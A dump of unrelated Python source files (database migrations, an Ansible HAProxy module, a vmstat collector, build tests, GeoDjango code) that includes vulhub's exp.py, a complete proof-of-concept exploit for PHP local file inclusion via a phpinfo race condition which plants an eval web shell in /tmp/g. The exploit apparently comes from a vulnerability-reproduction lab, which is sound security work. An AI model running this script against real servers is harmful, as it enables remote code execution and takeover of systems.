return myMarshaller.dumps(retlist)
|
ringo-framework/ringo | refs/heads/master | ringo/alembic/versions/3520cf26d8d8_.py | 4 | """Rename gid to default_gid in usergroups and modules
Revision ID: 3520cf26d8d8
Revises: 4ff2bc4eb9bf
Create Date: 2015-07-21 22:51:53.672633
"""
# revision identifiers, used by Alembic.
revision = '3520cf26d8d8'
down_revision = '4ff2bc4eb9bf'
from alembic import op
import sqlalchemy as sa
UPGRADE = """
"""
DOWNGRADE = """
"""
def iter_statements(stmts):
for st in [x for x in stmts.split('\n') if x]:
op.execute(st)
def upgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("users") as batch_op:
batch_op.add_column(sa.Column('default_gid', sa.Integer(), nullable=True))
batch_op.create_foreign_key('fk_defaul_gid_usergroups', 'usergroups', ['default_gid'], ['id'])
with op.batch_alter_table("modules") as batch_op:
batch_op.add_column(sa.Column('default_gid', sa.Integer(), nullable=True))
batch_op.create_foreign_key('fk_defaukt_gid_usergroups', 'usergroups', ['default_gid'], ['id'])
iter_statements(UPGRADE)
with op.batch_alter_table("modules") as batch_op:
batch_op.drop_column('gid')
with op.batch_alter_table("users") as batch_op:
batch_op.drop_column('gid')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('gid', sa.INTEGER(), autoincrement=False, nullable=True))
op.add_column('modules', sa.Column('gid', sa.INTEGER(), autoincrement=False, nullable=True))
iter_statements(DOWNGRADE)
op.drop_column('users', 'default_gid')
op.drop_column('modules', 'default_gid')
### end Alembic commands ###
|
xuchao666/msz | refs/heads/master | msz/market/migrations/0001_initial.py | 1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('name', models.CharField(unique=True, max_length=128, verbose_name='\u5206\u7c7b\u540d\u79f0')),
('info', models.CharField(max_length=50, verbose_name='\u7b80\u77ed\u4f18\u52bf')),
('image', models.ImageField(upload_to=b'market/category/', verbose_name='\u5206\u7c7b\u56fe\u7247', blank=True)),
('is_delete', models.BooleanField(default=False, verbose_name='\u662f\u5426\u5220\u9664')),
('code', models.CharField(max_length=50, null=True, verbose_name='\u5206\u7c7b\u7f16\u53f7', blank=True)),
('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
],
options={
'verbose_name': '\u5206\u7c7b',
'verbose_name_plural': '\u540e\u53f0\u6743\u9650',
},
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('name', models.CharField(max_length=50, verbose_name='\u540d\u79f0')),
('mobile', models.CharField(max_length=20, verbose_name='\u624b\u673a\u53f7', blank=True)),
('tel', models.CharField(max_length=20, verbose_name='\u8054\u7cfb\u65b9\u5f0f', blank=True)),
('image', models.ImageField(upload_to=b'market/category/', verbose_name='\u5206\u7c7b\u56fe\u7247', blank=True)),
('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
('manager', models.CharField(max_length=20, verbose_name='\u8d1f\u8d23\u4eba')),
],
options={
'verbose_name': '\u516c\u53f8',
'verbose_name_plural': '\u516c\u53f8',
},
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('name', models.CharField(unique=True, max_length=128, verbose_name='\u540d\u79f0')),
('code', models.CharField(max_length=50, null=True, verbose_name='\u5546\u54c1\u7f16\u7801', blank=True)),
('info', models.CharField(max_length=50, verbose_name='\u7b80\u77ed\u4f18\u52bf')),
('image', models.ImageField(upload_to=b'market/product/', verbose_name='\u5546\u54c1\u56fe\u7247\u56fe\u7247', blank=True)),
('is_delete', models.BooleanField(default=False, verbose_name='\u662f\u5426\u5220\u9664')),
('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
('materials', models.TextField(verbose_name='\u914d\u6599', blank=True)),
('category', models.ForeignKey(verbose_name='\u6240\u5c5e\u5206\u7c7b', to='market.Category')),
],
options={
'verbose_name': '\u5546\u54c1\u8868',
'verbose_name_plural': '\u5546\u54c1\u8868',
},
),
]
|
andmos/ansible | refs/heads/devel | lib/ansible/modules/net_tools/haproxy.py | 17 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ravi Bhure <ravibhure@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: haproxy
version_added: "1.9"
short_description: Enable, disable, and set weights for HAProxy backend servers using socket commands.
author: "Ravi Bhure (@ravibhure)"
description:
- Enable, disable, drain and set weights for HAProxy backend servers using socket
commands.
notes:
- Enable, disable and drain commands are restricted and can only be issued on
sockets configured for level 'admin'. For example, you can add the line
'stats socket /var/run/haproxy.sock level admin' to the general section of
haproxy.cfg. See U(http://haproxy.1wt.eu/download/1.5/doc/configuration.txt).
- Depends on netcat (nc) being available; you need to install the appropriate
package for your operating system before this module can be used.
options:
backend:
description:
- Name of the HAProxy backend pool.
default: auto-detected
drain:
description:
- Wait until the server has no active connections or until the timeout
determined by wait_interval and wait_retries is reached. Continue only
after the status changes to 'MAINT'. This overrides the
shutdown_sessions option.
type: bool
version_added: "2.4"
host:
description:
- Name of the backend host to change.
required: true
shutdown_sessions:
description:
- When disabling a server, immediately terminate all the sessions attached
to the specified server. This can be used to terminate long-running
sessions after a server is put into maintenance mode. Overridden by the
drain option.
type: bool
default: 'no'
socket:
description:
- Path to the HAProxy socket file.
default: /var/run/haproxy.sock
state:
description:
- Desired state of the provided backend host.
- Note that C(drain) state was added in version 2.4. It is supported only by HAProxy version 1.5 or later,
if used on versions < 1.5, it will be ignored.
required: true
choices: [ "enabled", "disabled", "drain" ]
fail_on_not_found:
description:
- Fail whenever trying to enable/disable a backend host that does not exist
type: bool
default: 'no'
version_added: "2.2"
wait:
description:
- Wait until the server reports a status of 'UP' when `state=enabled`,
status of 'MAINT' when `state=disabled` or status of 'DRAIN' when `state=drain`
type: bool
default: 'no'
version_added: "2.0"
wait_interval:
description:
- Number of seconds to wait between retries.
default: 5
version_added: "2.0"
wait_retries:
description:
- Number of times to check for status after changing the state.
default: 25
version_added: "2.0"
weight:
description:
- The value passed in argument. If the value ends with the `%` sign, then
the new weight will be relative to the initially configured weight.
Relative weights are only permitted between 0 and 100% and absolute
weights are permitted between 0 and 256.
'''
EXAMPLES = '''
# disable server in 'www' backend pool
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
backend: www
# disable server without backend pool name (apply to all available backend pool)
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
# disable server, provide socket file
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
# disable server, provide socket file, wait until status reports in maintenance
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
wait: yes
# Place server in drain mode, providing a socket file. Then check the server's
# status every minute to see if it changes to maintenance mode, continuing if it
# does in an hour and failing otherwise.
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
wait: yes
drain: yes
wait_interval: 1
wait_retries: 60
# disable backend server in 'www' backend pool and drop open sessions to it
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
backend: www
socket: /var/run/haproxy.sock
shutdown_sessions: true
# disable server without backend pool name (apply to all available backend pool) but fail when the backend host is not found
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
fail_on_not_found: yes
# enable server in 'www' backend pool
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
# enable server in 'www' backend pool wait until healthy
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
wait: yes
# enable server in 'www' backend pool wait until healthy. Retry 10 times with intervals of 5 seconds to retrieve the health
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
wait: yes
wait_retries: 10
wait_interval: 5
# enable server in 'www' backend pool with change server(s) weight
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
weight: 10
backend: www
# set the server in 'www' backend pool to drain mode
- haproxy:
state: drain
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
'''
import csv
import socket
import time
from string import Template
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_text
DEFAULT_SOCKET_LOCATION = "/var/run/haproxy.sock"
RECV_SIZE = 1024
ACTION_CHOICES = ['enabled', 'disabled', 'drain']
WAIT_RETRIES = 25
WAIT_INTERVAL = 5
######################################################################
class TimeoutException(Exception):
pass
class HAProxy(object):
"""
Used for communicating with HAProxy through its local UNIX socket interface.
Perform common tasks in Haproxy related to enable server and
disable server.
The complete set of external commands Haproxy handles is documented
on their website:
http://haproxy.1wt.eu/download/1.5/doc/configuration.txt#Unix Socket commands
"""
def __init__(self, module):
self.module = module
self.state = self.module.params['state']
self.host = self.module.params['host']
self.backend = self.module.params['backend']
self.weight = self.module.params['weight']
self.socket = self.module.params['socket']
self.shutdown_sessions = self.module.params['shutdown_sessions']
self.fail_on_not_found = self.module.params['fail_on_not_found']
self.wait = self.module.params['wait']
self.wait_retries = self.module.params['wait_retries']
self.wait_interval = self.module.params['wait_interval']
self._drain = self.module.params['drain']
self.command_results = {}
def execute(self, cmd, timeout=200, capture_output=True):
"""
Executes a HAProxy command by sending a message to a HAProxy's local
UNIX socket and waiting up to 'timeout' milliseconds for the response.
"""
self.client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.client.connect(self.socket)
self.client.sendall(to_bytes('%s\n' % cmd))
result = b''
buf = b''
buf = self.client.recv(RECV_SIZE)
while buf:
result += buf
buf = self.client.recv(RECV_SIZE)
result = to_text(result, errors='surrogate_or_strict')
if capture_output:
self.capture_command_output(cmd, result.strip())
self.client.close()
return result
def capture_command_output(self, cmd, output):
"""
Capture the output for a command
"""
if 'command' not in self.command_results:
self.command_results['command'] = []
self.command_results['command'].append(cmd)
if 'output' not in self.command_results:
self.command_results['output'] = []
self.command_results['output'].append(output)
def discover_all_backends(self):
"""
Discover all entries with svname = 'BACKEND' and return a list of their corresponding
pxnames
"""
data = self.execute('show stat', 200, False).lstrip('# ')
r = csv.DictReader(data.splitlines())
return tuple(map(lambda d: d['pxname'], filter(lambda d: d['svname'] == 'BACKEND', r)))
def discover_version(self):
"""
Attempt to extract the haproxy version.
Return a tuple containing major and minor version.
"""
data = self.execute('show info', 200, False)
lines = data.splitlines()
line = [x for x in lines if 'Version:' in x]
try:
version_values = line[0].partition(':')[2].strip().split('.', 3)
version = (int(version_values[0]), int(version_values[1]))
except (ValueError, TypeError, IndexError):
version = None
return version
def execute_for_backends(self, cmd, pxname, svname, wait_for_status=None):
"""
Run some command on the specified backends. If no backends are provided they will
be discovered automatically (all backends)
"""
# Discover backends if none are given
if pxname is None:
backends = self.discover_all_backends()
else:
backends = [pxname]
# Run the command for each requested backend
for backend in backends:
# Fail when backends were not found
state = self.get_state_for(backend, svname)
if (self.fail_on_not_found) and state is None:
self.module.fail_json(
msg="The specified backend '%s/%s' was not found!" % (backend, svname))
if state is not None:
self.execute(Template(cmd).substitute(pxname=backend, svname=svname))
if self.wait:
self.wait_until_status(backend, svname, wait_for_status)
def get_state_for(self, pxname, svname):
"""
Find the state of specific services. When pxname is not set, get all backends for a specific host.
Returns a list of dictionaries containing the status and weight for those services.
"""
data = self.execute('show stat', 200, False).lstrip('# ')
r = csv.DictReader(data.splitlines())
state = tuple(
map(
lambda d: {'status': d['status'], 'weight': d['weight'], 'scur': d['scur']},
filter(lambda d: (pxname is None or d['pxname']
== pxname) and d['svname'] == svname, r)
)
)
return state or None
def wait_until_status(self, pxname, svname, status):
"""
Wait for a service to reach the specified status. Try RETRIES times
with INTERVAL seconds of sleep in between. If the service has not reached
the expected status in that time, the module will fail. If the service was
not found, the module will fail.
"""
for i in range(1, self.wait_retries):
state = self.get_state_for(pxname, svname)
# We can assume there will only be 1 element in state because both svname and pxname are always set when we get here
if state[0]['status'] == status:
if not self._drain or (state[0]['scur'] == '0' and state == 'MAINT'):
return True
else:
time.sleep(self.wait_interval)
self.module.fail_json(msg="server %s/%s not status '%s' after %d retries. Aborting." %
(pxname, svname, status, self.wait_retries))
def enabled(self, host, backend, weight):
"""
Enabled action, marks server to UP and checks are re-enabled,
also supports to get current weight for server (default) and
set the weight for haproxy backend server when provides.
"""
cmd = "get weight $pxname/$svname; enable server $pxname/$svname"
if weight:
cmd += "; set weight $pxname/$svname %s" % weight
self.execute_for_backends(cmd, backend, host, 'UP')
def disabled(self, host, backend, shutdown_sessions):
"""
Disabled action, marks server to DOWN for maintenance. In this mode, no more checks will be
performed on the server until it leaves maintenance,
also it shutdown sessions while disabling backend host server.
"""
cmd = "get weight $pxname/$svname; disable server $pxname/$svname"
if shutdown_sessions:
cmd += "; shutdown sessions server $pxname/$svname"
self.execute_for_backends(cmd, backend, host, 'MAINT')
def drain(self, host, backend, status='DRAIN'):
"""
Drain action, sets the server to DRAIN mode.
In this mode mode, the server will not accept any new connections
other than those that are accepted via persistence.
"""
haproxy_version = self.discover_version()
# check if haproxy version suppots DRAIN state (starting with 1.5)
if haproxy_version and (1, 5) <= haproxy_version:
cmd = "set server $pxname/$svname state drain"
self.execute_for_backends(cmd, backend, host, status)
def act(self):
"""
Figure out what you want to do from ansible, and then do it.
"""
# Get the state before the run
state_before = self.get_state_for(self.backend, self.host)
self.command_results['state_before'] = state_before
# toggle enable/disbale server
if self.state == 'enabled':
self.enabled(self.host, self.backend, self.weight)
elif self.state == 'disabled' and self._drain:
self.drain(self.host, self.backend, status='MAINT')
elif self.state == 'disabled':
self.disabled(self.host, self.backend, self.shutdown_sessions)
elif self.state == 'drain':
self.drain(self.host, self.backend)
else:
self.module.fail_json(msg="unknown state specified: '%s'" % self.state)
# Get the state after the run
state_after = self.get_state_for(self.backend, self.host)
self.command_results['state_after'] = state_after
# Report change status
if state_before != state_after:
self.command_results['changed'] = True
self.module.exit_json(**self.command_results)
else:
self.command_results['changed'] = False
self.module.exit_json(**self.command_results)
def main():
# load ansible module object
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, default=None, choices=ACTION_CHOICES),
host=dict(required=True, default=None),
backend=dict(required=False, default=None),
weight=dict(required=False, default=None),
socket=dict(required=False, default=DEFAULT_SOCKET_LOCATION),
shutdown_sessions=dict(required=False, default=False, type='bool'),
fail_on_not_found=dict(required=False, default=False, type='bool'),
wait=dict(required=False, default=False, type='bool'),
wait_retries=dict(required=False, default=WAIT_RETRIES, type='int'),
wait_interval=dict(required=False, default=WAIT_INTERVAL, type='int'),
drain=dict(default=False, type='bool'),
),
)
if not socket:
module.fail_json(msg="unable to locate haproxy socket")
ansible_haproxy = HAProxy(module)
ansible_haproxy.act()
if __name__ == '__main__':
main()
|
WSDC-NITWarangal/django | refs/heads/master | django/views/__init__.py | 12133432 | |
tarunlnmiit/django-crispy-forms | refs/heads/dev | crispy_forms/models.py | 12133432 | |
brandonPurvis/osf.io | refs/heads/develop | api_tests/files/__init__.py | 12133432 | |
gauravbose/digital-menu | refs/heads/master | django/conf/locale/tr/__init__.py | 12133432 | |
knewmanTE/FrameworkBenchmarks | refs/heads/master | frameworks/Python/turbogears/models/World.py | 79 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy.types import String, Integer
Base = declarative_base()
class World(Base):
__tablename__ = "world"
id = Column(Integer, primary_key = True)
randomNumber = Column(Integer)
def serialize(self):
return {
'id' : int(self.id),
'randomNumber' : int(self.randomNumber)
}
|
esikachev/my-dev-client | refs/heads/master | my_dev/utils.py | 1 | import os
def write_to_config(username, host):
with open(os.path.join(os.path.expanduser("~"), '.my.conf'), 'w') as cfg:
config = '[DEFAULT]\nusername=%s\nhost=%s\n'
cfg.write(config % (username, host))
|
vulhub/vulhub | refs/heads/master | php/inclusion/exp.py | 1 | #!/usr/bin/python
import sys
import threading
import socket
def setup(host, port):
TAG="Security Test"
PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG
REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
padding="A" * 5000
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
#modify this to suit the LFI script
LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] => ")
fn = d[i+17:i+31]
except ValueError:
return None
s2.send(lfireq % (fn, host))
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter=0
class ThreadWorker(threading.Thread):
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter+=1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print "\nGot it! Shell created in /tmp/g"
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
"""Gets offset of tmp_name in the php output"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d+=i
if i == "":
break
# detect the final chunk
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] => ")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print "found %s at %i" % (d[i:i+10],i)
# padded up a bit
return i+256
def main():
print "LFI With PHPInfo()"
print "-=" * 30
if len(sys.argv) < 2:
print "Usage: %s host [port] [threads]" % sys.argv[0]
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error, e:
print "Error with hostname %s: %s" % (sys.argv[1], e)
sys.exit(1)
port=80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError, e:
print "Error with port %d: %s" % (sys.argv[2], e)
sys.exit(1)
poolsz=10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError, e:
print "Error with poolsz %d: %s" % (sys.argv[3], e)
sys.exit(1)
print "Getting initial offset...",
reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp)
sys.stdout.flush()
maxattempts = 1000
e = threading.Event()
l = threading.Lock()
print "Spawning worker pool (%d)..." % poolsz
sys.stdout.flush()
tp = []
for i in range(0,poolsz):
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
print
if e.is_set():
print "Woot! \m/"
else:
print ":("
except KeyboardInterrupt:
print "\nTelling threads to shutdown..."
e.set()
print "Shuttin' down..."
for t in tp:
t.join()
if __name__=="__main__":
main() |
ColdrickSotK/storyboard | refs/heads/master | storyboard/db/migration/alembic_migrations/versions/059_add_a_table_for_comment_history.py | 1 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add a table for comment history
Revision ID: 059
Revises: 058
Create Date: 2016-06-21 14:00:20.515139
"""
# revision identifiers, used by Alembic.
revision = '059'
down_revision = '058'
from alembic import op
import sqlalchemy as sa
from storyboard.db.decorators import UTCDateTime
from storyboard.db.models import MYSQL_MEDIUM_TEXT
def upgrade(active_plugins=None, options=None):
op.create_table(
'comments_history',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', UTCDateTime(), nullable=True),
sa.Column('updated_at', UTCDateTime(), nullable=True),
sa.Column('content', MYSQL_MEDIUM_TEXT, nullable=True),
sa.Column('comment_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['comment_id'], ['comments.id'],
name='fk_comment_id'),
sa.PrimaryKeyConstraint('id')
)
def downgrade(active_plugins=None, options=None):
op.drop_table('comments_history')
|
Block137/Dual2 | refs/heads/Dual2 | mk/PX4/Tools/genmsg/test/test_genmsg_command_line.py | 216 | # Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
def test_includepath_to_dict():
from genmsg.command_line import includepath_to_dict
assert {} == includepath_to_dict([])
assert {'std_msgs': [ 'foo' ]} == includepath_to_dict(['std_msgs:foo'])
assert {'std_msgs': [ 'foo' ], 'bar_msgs': [ 'baz:colon' ]} == includepath_to_dict(['std_msgs:foo', 'bar_msgs:baz:colon'])
|
mei3am/androguard | refs/heads/master | androcsign.py | 38 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys
from androguard.core import androconf
sys.path.append("./elsim/")
from elsim.elsign import dalvik_elsign
from optparse import OptionParser
option_0 = { 'name' : ('-i', '--input'), 'help' : 'file : use this filename', 'nargs' : 1 }
option_1 = { 'name' : ('-r', '--remove'), 'help' : 'remote the signature', 'nargs' : 1 }
option_2 = { 'name' : ('-o', '--output'), 'help' : 'output database', 'nargs' : 1 }
option_3 = { 'name' : ('-l', '--list'), 'help' : 'list signatures in database', 'nargs' : 1 }
option_4 = { 'name' : ('-c', '--check'), 'help' : 'check signatures in database', 'nargs' : 1 }
option_5 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
options = [option_0, option_1, option_2, option_3, option_4, option_5]
def main(options, arguments) :
s = dalvik_elsign.CSignature(pcs=dalvik_elsign.PublicCSignature)
if options.input != None :
ret = s.add_file( open( options.input, "rb" ).read() )
if ret != None and options.output != None :
s.add_indb( ret, options.output )
elif options.list != None :
s.list_indb( options.list )
elif options.remove != None :
s.remove_indb( options.remove, options.output )
elif options.check != None :
s.check_db( options.check )
elif options.version != None :
print "Androcsign version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__" :
parser = OptionParser()
for option in options :
param = option['name']
del option['name']
parser.add_option(*param, **option)
options, arguments = parser.parse_args()
sys.argv[:] = arguments
main(options, arguments)
|
Ssawa/Diamond | refs/heads/master | src/collectors/vmstat/vmstat.py | 16 | # coding=utf-8
"""
Uses /proc/vmstat to collect data on virtual memory manager
#### Dependencies
* /proc/vmstat
"""
import diamond.collector
import os
import re
class VMStatCollector(diamond.collector.Collector):
PROC = '/proc/vmstat'
MAX_VALUES = {
'pgfault': diamond.collector.MAX_COUNTER,
'pgmajfault': diamond.collector.MAX_COUNTER,
'pgpgin': diamond.collector.MAX_COUNTER,
'pgpgout': diamond.collector.MAX_COUNTER,
'pswpin': diamond.collector.MAX_COUNTER,
'pswpout': diamond.collector.MAX_COUNTER,
}
def get_default_config_help(self):
config_help = super(VMStatCollector, self).get_default_config_help()
config_help.update({
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(VMStatCollector, self).get_default_config()
config.update({
'path': 'vmstat'
})
return config
def collect(self):
if not os.access(self.PROC, os.R_OK):
return None
# open file
file = open(self.PROC)
exp = '^(pgfault|pgmajfault|pgpgin|pgpgout|pswpin|pswpout)\s(\d+)'
reg = re.compile(exp)
# Build regex
for line in file:
match = reg.match(line)
if match:
name = match.group(1)
value = match.group(2)
max_value = self.MAX_VALUES[name]
derived = self.derivative(name, int(value), max_value)
self.publish(name, derived, raw_value=int(value), precision=2)
# Close file
file.close()
|
clar/gyp | refs/heads/master | test/make_global_settings/full-toolchain/gyptest-make_global_settings.py | 83 | #!/usr/bin/env python
# Copyright (c) 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies make_global_settings works with the full toolchain.
"""
import os
import sys
import TestGyp
if sys.platform == 'win32':
# cross compiling not supported by ninja on windows
# and make not supported on windows at all.
sys.exit(0)
test = TestGyp.TestGyp(formats=['ninja'])
# Must set the test format to something with a flavor (the part after the '-')
# in order to test the desired behavior. Since we want to run a non-host
# toolchain, we have to set the flavor to something that the ninja generator
# doesn't know about, so it doesn't default to the host-specific tools (e.g.,
# 'otool' on mac to generate the .TOC).
#
# Note that we can't just pass format=['ninja-some_toolchain'] to the
# constructor above, because then this test wouldn't be recognized as a ninja
# format test.
test.formats = ['ninja-my_flavor' if f == 'ninja' else f for f in test.formats]
gyp_file = 'make_global_settings.gyp'
test.run_gyp(gyp_file,
# Teach the .gyp file about the location of my_nm.py and
# my_readelf.py, and the python executable.
'-Dworkdir=%s' % test.workdir,
'-Dpython=%s' % sys.executable)
test.build(gyp_file,
arguments=['-v'] if test.format == 'ninja-my_flavor' else [])
expected = ['MY_CC', 'MY_CXX']
test.must_contain_all_lines(test.stdout(), expected)
test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')
test.pass_test()
|
errx/django | refs/heads/master | django/contrib/gis/db/models/sql/query.py | 32 | from django.db import connections
from django.db.models.query import sql
from django.contrib.gis.db.models.constants import ALL_TERMS
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import aggregates as gis_aggregates
from django.contrib.gis.db.models.sql.conversion import AreaField, DistanceField, GeomField
from django.contrib.gis.db.models.sql.where import GeoWhereNode
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Area, Distance
class GeoQuery(sql.Query):
"""
A single spatial SQL query.
"""
# Overridding the valid query terms.
query_terms = ALL_TERMS
aggregates_module = gis_aggregates
compiler = 'GeoSQLCompiler'
#### Methods overridden from the base Query class ####
def __init__(self, model, where=GeoWhereNode):
super(GeoQuery, self).__init__(model, where)
